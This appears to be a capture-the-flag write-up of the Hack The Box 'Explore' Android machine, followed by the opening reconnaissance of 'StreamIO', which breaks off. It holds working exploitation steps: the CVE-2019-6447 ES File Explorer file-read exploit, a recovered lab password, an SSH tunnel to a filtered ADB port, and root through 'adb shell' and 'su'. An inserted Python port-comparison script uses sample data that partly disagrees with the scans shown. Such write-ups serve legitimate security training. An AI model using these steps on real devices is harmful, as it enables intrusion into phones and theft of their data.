UDP Scan Timing: About 99.99% done; ETC: 14:43 (0:00:00 remaining)
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.28s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT      STATE         SERVICE
1900/udp  open|filtered upnp
3130/udp  open|filtered squid-ipc
5353/udp  open|filtered zeroconf
6050/udp  open|filtered x11
18985/udp open|filtered unknown
21948/udp open|filtered unknown
36458/udp open|filtered unknown
49306/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1150.51 seconds

Vulnerability script scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --script=vuln -p 2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451 10.129.178.12 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:42 CST
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.37s latency).

PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
15262/tcp closed   unknown
30972/tcp closed   unknown
32708/tcp closed   unknown
33415/tcp closed   unknown
35169/tcp closed   unknown
42135/tcp open     unknown
59777/tcp open     unknown
62324/tcp closed   unknown
64451/tcp closed   unknown

Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds

Scan result analysis

First, the nmap output says the device is probably a phone. Port 2222 runs an SSH server (the developer apparently being called Banana Studio), port 42135 runs ES File Explorer, a very common app on Android, and port 59777 runs a JSONAPI for a Minecraft game server. There is no obvious lead yet, so let's search for these unfamiliar names first:

Clearing the fog

[search result screenshot omitted]
This confirms our guess.
[screenshot omitted]
Searching for freeciv:
[screenshot omitted]
We learn that freeciv is used to create multi-user game servers, but this port is also commonly used by the Android Debug Bridge (ADB), which is effectively a shell; given that the port is filtered, ADB is the more likely candidate.

Note: when searching, always combine all the distinctive keywords related to the item, so that the results are more precise.

Exploitation

Looking for public exploits

Next, based on the potential attack surface already found (the applications exposed on the ports), look for public exploits, first with searchsploit and then via search engines, GitHub and so on:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit banana studio
Exploits: No Results
Shellcodes: No Results
                                                                                                                                                                               
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit banana       
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                               |  Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Banana Dance - Cross-Site Scripting / SQL Injection                                                                                          | php/webapps/37646.txt
banana dance b.2.6 - Multiple Vulnerabilities                                                                                                | php/webapps/23573.txt
Banana Dance CMS and Wiki - SQL Injection                                                                                                    | php/webapps/17919.txt
Bananadance Wiki b2.2 - Multiple Vulnerabilities                                                                                             | php/webapps/22654.txt
Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation                                                                                    | hardware/local/40271.txt
Hot Banana Web Content Management Suite 5.3 - Cross-Site Scripting                                                                           | cfm/webapps/26882.txt
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Obviously none of these match our situation, so switch to another program's keyword:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit ES File Explorer
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                               |  Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities                                                                                 | php/webapps/51615.txt
ES File Explorer 4.1.9.7.4 - Arbitrary File Read                                                                                             | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal                                                                                                 | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure                                                                                    | windows/remote/20488.txt
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)                                                      | windows/remote/3808.html
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)                                                          | windows/remote/24495.rb
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)                                                          | windows/remote/24538.rb
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)                                                                | windows/remote/25999.rb
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                                                                                 | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution                                          | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access                                              | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write                                     | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification                        | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                                                                              | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution                                                                               | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access                                                                                            | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                                                                            | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                                                                                    | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                                                                                          | php/webapps/35851.txt
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The second entry clearly matches. Although we don't know the exact version, it is worth a try; first download the corresponding exploit:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit -m 50070        
  Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/50070
     Path: /usr/share/exploitdb/exploits/android/remote/50070.py
    Codes: CVE-2019-6447
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/cvestone/Desktop/htb/Explore/50070.py
                   
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ls
10.129.178.12.gnmap  10.129.178.12.nmap  10.129.178.12.xml  50070.py  Explore.pdf  nmapscan

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# head -n 20 50070.py
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447

import requests
import json
import ast
import sys

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]

ES File Explorer arbitrary file read

This is the exploit for the arbitrary file read vulnerability; its usage can be read from the source. Try running it:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py getDeviceInfo 10.129.178.12

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : VMware Virtual Platform
ftpRoot : /sdcard
ftpPort : 3721

# list only the picture files first rather than all files, since the full listing is too long to be the first choice
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py listPics 10.129.178.12

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

creds.jpg is the most interesting find here; the others turned out to have little value after reading them. Download that picture:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py getFile 10.129.178.12 /storage/emulated/0/DCIM/creds.jpg                                                                                                 

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...

[+] Done. Saved as `out.dat`.

[screenshot of creds.jpg omitted]
It looks like a credential; note it down: kristi:Kr1sT!5h@Rp3xPl0r3!
The letter case may have been misread from the image, so if it fails remember to try other variants. The obvious next step is to test whether it is an SSH credential.

Getting a foothold

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh kristi@10.129.178.12 -p 2222
Unable to negotiate with 10.129.178.12 port 2222: no matching host key type found. Their offer: ssh-rsa

This error means the SSH client and server cannot agree on a host key type: the server only offers ssh-rsa, which recent OpenSSH clients no longer accept by default, so the connection fails. The fix is the ssh client's -o option, explicitly allowing the host key algorithm the server offers:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh -oHostKeyAlgorithms=ssh-rsa kristi@10.129.178.12 -p 2222
The authenticity of host '[10.129.178.12]:2222 ([10.129.178.12]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.129.178.12]:2222' (RSA) to the list of known hosts.
Password authentication
(kristi@10.129.178.12) Password: 
127|:/ $ whoami
u0_a76
:/ $ uname -a
Linux localhost 4.9.214-android-x86_64-g04f9324 #1 SMP PREEMPT Wed Mar 25 17:11:29 CST 2020 x86_64
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

This is clearly an ordinary user; let's see what files there are:

:/ $ ls -liah
total 1.4M
  5231 drwxrwxrwt  15 root   root    980 2024-02-19 22:42 .
  5231 drwxrwxrwt  15 root   root    980 2024-02-19 22:42 ..
     1 dr-xr-xr-x  52 root   root      0 2024-02-19 22:42 acct
  5240 lrwxrwxrwx   1 root   root     11 2024-02-19 22:42 bin -> /system/bin
  5241 lrwxrwxrwx   1 root   root     50 2024-02-19 22:42 bugreports -> /data/user_de/0/com.android.shell/files/bugreports
  5575 drwxrwx---   6 system cache   120 2024-02-19 22:42 cache
  5243 lrwxrwxrwx   1 root   root     13 2024-02-19 22:42 charger -> /sbin/charger
  5519 drwxr-xr-x   3 root   root      0 2024-02-19 22:42 config
  5245 lrwxrwxrwx   1 root   root     17 2024-02-19 22:42 d -> /sys/kernel/debug
163842 drwxrwx--x  37 system system 4.0K 2021-03-15 16:49 data
  5247 -rw-------   1 root   root   1.0K 2024-02-19 22:42 default.prop
  5304 drwxr-xr-x  16 root   root   2.6K 2024-02-19 22:42 dev
  5249 lrwxrwxrwx   1 root   root     11 2024-02-19 22:42 etc -> /system/etc
  5250 -rw-r-----   1 root   root    753 2024-02-19 22:42 fstab.android_x86_64
  5251 -rwxr-x---   1 root   root   2.2M 2024-02-19 22:42 init
  5252 -rwxr-x---   1 root   root   3.3K 2024-02-19 22:42 init.android_x86_64.rc
  5253 -rwxr-x---   1 root   root   1.0K 2024-02-19 22:42 init.environ.rc
  5254 -rwxr-x---   1 root   root    29K 2024-02-19 22:42 init.rc
  5255 -rwxr-x---   1 root   root    582 2024-02-19 22:42 init.superuser.rc
  5256 -rwxr-x---   1 root   root   7.5K 2024-02-19 22:42 init.usb.configfs.rc
  5257 -rwxr-x---   1 root   root   5.5K 2024-02-19 22:42 init.usb.rc
  5258 -rwxr-x---   1 root   root    511 2024-02-19 22:42 init.zygote32.rc
  5259 -rwxr-x---   1 root   root    875 2024-02-19 22:42 init.zygote64_32.rc
  5404 lrwxrwxrwx   1 root   root     10 2024-02-19 22:42 lib -> system/lib
  5311 drwxr-xr-x  11 root   system  240 2024-02-19 22:42 mnt
  5261 drwxr-xr-x   2 root   root    220 2024-02-19 22:42 odm
  5271 drwxr-xr-x   2 root   root     40 2024-02-19 22:42 oem
  5272 -rw-r--r--   1 root   root    23K 2024-02-19 22:42 plat_file_contexts
  5273 -rw-r--r--   1 root   root   7.0K 2024-02-19 22:42 plat_hwservice_contexts
  5274 -rw-r--r--   1 root   root   6.5K 2024-02-19 22:42 plat_property_contexts
  5275 -rw-r--r--   1 root   root   1.2K 2024-02-19 22:42 plat_seapp_contexts
  5276 -rw-r--r--   1 root   root    14K 2024-02-19 22:42 plat_service_contexts
     1 dr-xr-xr-x 184 root   root      0 2024-02-19 22:42 proc
  5278 lrwxrwxrwx   1 root   root     15 2024-02-19 22:42 product -> /system/product
  5279 drwxr-x---   2 root   root    140 2024-02-19 22:42 sbin
  5285 lrwxrwxrwx   1 root   root     21 2024-02-19 22:42 sdcard -> /storage/self/primary
  5286 -rw-r--r--   1 root   root   357K 2024-02-19 22:42 sepolicy
  5534 drwxr-xr-x   4 root   root     80 2024-02-19 22:42 storage
     1 dr-xr-xr-x  12 root   root      0 2024-02-19 22:42 sys
     2 drwxr-xr-x  18 root   root   4.0K 2020-03-25 00:12 system
  5290 -rw-r--r--   1 root   root    464 2024-02-19 22:42 ueventd.android_x86_64.rc
  5291 -rw-r--r--   1 root   root   5.0K 2024-02-19 22:42 ueventd.rc
  5292 lrwxrwxrwx   1 root   root     14 2024-02-19 22:42 vendor -> /system/vendor
  5293 -rw-r--r--   1 root   root   6.9K 2024-02-19 22:42 vendor_file_contexts
  5294 -rw-r--r--   1 root   root      0 2024-02-19 22:42 vendor_hwservice_contexts
  5295 -rw-r--r--   1 root   root    392 2024-02-19 22:42 vendor_property_contexts
  5296 -rw-r--r--   1 root   root      0 2024-02-19 22:42 vendor_seapp_contexts
  5297 -rw-r--r--   1 root   root      0 2024-02-19 22:42 vendor_service_contexts
  5298 -rw-r--r--   1 root   root     65 2024-02-19 22:42 vndservice_contexts

It resembles the directory layout of a Linux root, but with differences; there is no home directory. Look at a few directories of interest:

:/ $ ls -liah data 
ls: data: Permission denied
1|:/ $ ls -liah sdcard
5285 lrwxrwxrwx 1 root root 21 2024-02-19 22:42 sdcard -> /storage/self/primary
:/ $ cd /storage/self/primary
:/storage/self/primary $ ls -liah
total 34K
180766 drwxrwx--- 15 root everybody 4.0K 2021-04-21 02:12 .
172116 drwx--x--x  4 root everybody 4.0K 2021-03-13 17:16 ..
181241 drwxrwx---  5 root everybody 4.0K 2021-03-13 17:30 .estrongs
180902 -rw-rw----  1 root everybody   72 2024-02-19 22:43 .userReturn
180804 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Alarms
180773 drwxrwx---  3 root everybody 4.0K 2021-03-13 17:16 Android
180809 drwxrwx---  2 root everybody 4.0K 2021-04-21 02:38 DCIM
180808 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:37 Download
180807 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Movies
180801 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Music
180805 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Notifications
180806 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Pictures
180802 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Podcasts
180803 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Ringtones
188897 drwxrwx---  3 root everybody 4.0K 2021-03-13 17:30 backups
188491 drwxrwx---  2 root everybody 4.0K 2021-04-21 02:12 dianxinos
180731 -rw-rw----  1 root everybody   33 2021-03-13 18:28 user.txt

We find user.txt under the mounted sdcard path:

:/storage/self/primary $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

We also find an interesting backups directory:

:/storage/self/primary $ cd backups
:/storage/self/primary/backups $ ls -liah
total 6.0K
188897 drwxrwx---  3 root everybody 4.0K 2021-03-13 17:30 .
180766 drwxrwx--- 15 root everybody 4.0K 2021-04-21 02:12 ..
188898 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:30 apps
:/storage/self/primary/backups $ cd apps
:/storage/self/primary/backups/apps $ ls -liah                                 
total 4.0K
188898 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:30 .
188897 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:30 ..

But it contains nothing. Keep looking for other paths of interest; although this is Android, we can still try the attack paths used when looking for Linux privilege escalation. After several attempts nothing of much interest turned up; more precisely, I lacked the experience to find it.

A first look at ADB

From the earlier port scan, although nmap mapped port 5555 to freeciv, it is quite likely ADB. Since our goal is privilege escalation, and ADB requires the highest privileges to function normally, it is the first thing to try. First check the state of port 5555 on the target itself:

:/ $ ss -tln
State       Recv-Q Send-Q Local Address:Port               Peer Address:Port              
LISTEN      0      50           *:2222                     *:*                  
LISTEN      0      8       [::ffff:127.0.0.1]:35955                    *:*                  
LISTEN      0      4            *:5555                     *:*                  
LISTEN      0      10           *:42135                    *:*                  
LISTEN      0      50      [::ffff:10.129.178.12]:40471                    *:*                  
LISTEN      0      50           *:59777                    *:*         

Port 5555 is indeed listening inside the target, whereas the external nmap scan showed it as filtered; now we can try it. This indirectly confirms the value of this port and of ADB, since otherwise there would be no reason to filter and hide it. As a check, we can also try connecting to the target with the local adb tool or nc:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb connect 10.129.178.12
failed to connect to '10.129.178.12:5555': Connection timed out

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nc 10.129.178.12 5555
Ncat: TIMEOUT.

Both methods time out.
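The way port 5555 stood out here, listening on the target but filtered from outside, can be checked systematically. The following Python script is an added example (not part of the original write-up): it parses the external nmap result and the internal `ss -tln` listing, using sample input constructed from the two outputs above, and reports every non-loopback listener that the external scan did not see as open; it also serves as a structured alternative to the grep/awk port extraction used earlier.

```python
import re
from typing import Dict, List, NamedTuple, Tuple

# One "PORT/tcp STATE SERVICE" line of an nmap -oN / .nmap report.
NMAP_PORT_LINE = re.compile(
    r"^(?P<port>\d+)/tcp\s+(?P<state>open|closed|filtered)\s+\S+")
# nmap's summary line for the ports it did not list individually.
NMAP_NOT_SHOWN = re.compile(
    r"^Not shown: \d+ (?P<state>closed|filtered) tcp ports")
# One LISTEN line of `ss -tln` ("*" means any address).
SS_LISTEN_LINE = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s")
LOOPBACK = {"127.0.0.1", "[::1]", "[::ffff:127.0.0.1]"}


def parse_nmap(text: str) -> Tuple[Dict[int, str], str]:
    """Return {port: state} for the listed TCP ports plus the state nmap
    assigned to every port it did not list ('closed' in the scan above)."""
    states: Dict[int, str] = {}
    default_state = "unknown"
    for line in text.splitlines():
        m = NMAP_PORT_LINE.match(line)
        if m:
            states[int(m.group("port"))] = m.group("state")
            continue
        m = NMAP_NOT_SHOWN.match(line)
        if m:
            default_state = m.group("state")
    return states, default_state


def parse_ss(text: str) -> Dict[int, str]:
    """Return {port: local address} for every LISTEN line of `ss -tln`."""
    listeners: Dict[int, str] = {}
    for line in text.splitlines():
        m = SS_LISTEN_LINE.match(line)
        if m:
            listeners[int(m.group("port"))] = m.group("addr")
    return listeners


class HiddenListener(NamedTuple):
    port: int
    local_addr: str
    external_state: str


def hidden_listeners(nmap_text: str, ss_text: str) -> List[HiddenListener]:
    """Ports bound on a non-loopback address that the external scan did not
    report as open: candidates for a firewall filter (or an SSH tunnel)."""
    states, default_state = parse_nmap(nmap_text)
    found: List[HiddenListener] = []
    for port, addr in sorted(parse_ss(ss_text).items()):
        if addr in LOOPBACK:
            continue  # only reachable from the host itself anyway
        state = states.get(port, default_state)
        if state != "open":
            found.append(HiddenListener(port, addr, state))
    return found


# Constructed sample input, copied from the scan and ss output above.
NMAP_SAMPLE = """\
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.29s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
15262/tcp filtered unknown
35169/tcp open     unknown
42135/tcp open     unknown
59777/tcp open     unknown
"""

SS_SAMPLE = """\
State       Recv-Q Send-Q Local Address:Port               Peer Address:Port
LISTEN      0      50           *:2222                     *:*
LISTEN      0      8       [::ffff:127.0.0.1]:35955                    *:*
LISTEN      0      4            *:5555                     *:*
LISTEN      0      10           *:42135                    *:*
LISTEN      0      50      [::ffff:10.129.178.12]:40471                    *:*
LISTEN      0      50           *:59777                    *:*
"""


if __name__ == "__main__":
    for h in hidden_listeners(NMAP_SAMPLE, SS_SAMPLE):
        print(f"port {h.port} listens on {h.local_addr} but is "
              f"{h.external_state} from outside")
```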

SSH port forwarding

But we already have an ordinary user shell on the target, so we can bypass the filter by forwarding the port through an SSH tunnel:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh -L 5555:localhost:5555 kristi@10.129.178.12 -p 2222 -oHostKeyAlgorithms=ssh-rsa                         
Password authentication
(kristi@10.129.178.12) Password: 
:/ $ 

This forwards the target's local port 5555 to local port 5555 on our Kali machine.

Connecting to ADB remotely

Trying to connect to ADB again, it now succeeds:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb connect 127.0.0.1
connected to 127.0.0.1:5555

Privilege escalation

With ADB connected, we can get a shell and escalate privileges directly:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb shell            
x86_64:/ $ whoami                                                                                                    
shell
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su
:/ # whoami
root
:/ # cd data
:/data # ls
adb           bootchart     media       property       tombstones 
anr           cache         mediadrm    resource-cache user       
app           dalvik-cache  misc        root.txt       user_de    
app-asec      data          misc_ce     ss             vendor     
app-ephemeral drm           misc_de     ssh_starter.sh vendor_ce  
app-lib       es_starter.sh nfc         system         vendor_de  
app-private   local         ota         system_ce      
backup        lost+found    ota_package system_de      
:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5

The data directory was not accessible earlier; revisiting it as root we finally see the final flag.

Summary

The nmap results show only unfamiliar, unusual ports, because the target is an unfamiliar device, so this machine mainly exercises information-gathering thinking. It is well suited as a first machine for Android penetration testing: it teaches the basic Android directory layout, builds up some potentially valuable attack paths, gives a basic understanding of ADB, the most common tool for debugging Android devices, and adds experience with it as an Android privilege-escalation method. The relatively tricky part is the SSH port forwarding.

StreamIO

Study notes on "Red Team Notes"

Machine introduction

StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection in order to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code for the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used in lateral movement. As the secondary user we use `WinPEAS` to enumerate the system and find saved browser databases, which are decoded to expose new credentials. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group in which they can read LDAP secrets. Without direct access to the account we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then access LDAP to disclose the administrator LAPS password.

Difficulty

Medium

Information gathering

Full TCP port scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nmap --min-rate 10000 -sT -p- 10.129.226.249 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:24 CST
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 87.82% done; ETC: 17:25 (0:00:11 remaining)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49677/tcp open  unknown
49678/tcp open  unknown
49744/tcp open  unknown
52734/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 93.82 seconds

Processing the port list:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# export $ports
export: not an identifier: 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734

Detailed TCP scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nmap -sT -sC -sV -T4 -O -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734 10.129.226.249 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:34 CST
NSOCK ERROR [202.3680s] mksock_bind_addr(): Bind to 0.0.0.0:902 failed (IOD #153): Address already in use (98)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.25s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-20 16:34:26Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: 2024-02-20T16:37:42+00:00; +6h59m35s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49744/tcp open  msrpc         Microsoft Windows RPC
52734/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (87%)
Aggressive OS guesses: Microsoft Windows Server 2019 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-02-20T16:37:05
|_  start_date: N/A
|_clock-skew: mean: 6h59m34s, deviation: 0s, median: 6h59m34s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.77 seconds

UDP port scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sU --top-ports 1000 10.129.226.249 -oA nmapscan/udpors
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:24 CST
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 29.75% done; ETC: 17:28 (0:02:57 remaining)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.27s latency).
Not shown: 997 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp

Nmap done: 1 IP address (1 host up) scanned in 1371.18 seconds

Vulnerability script scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --script=vuln -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734 10.129.226.249 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:36 CST
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.30s latency).

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
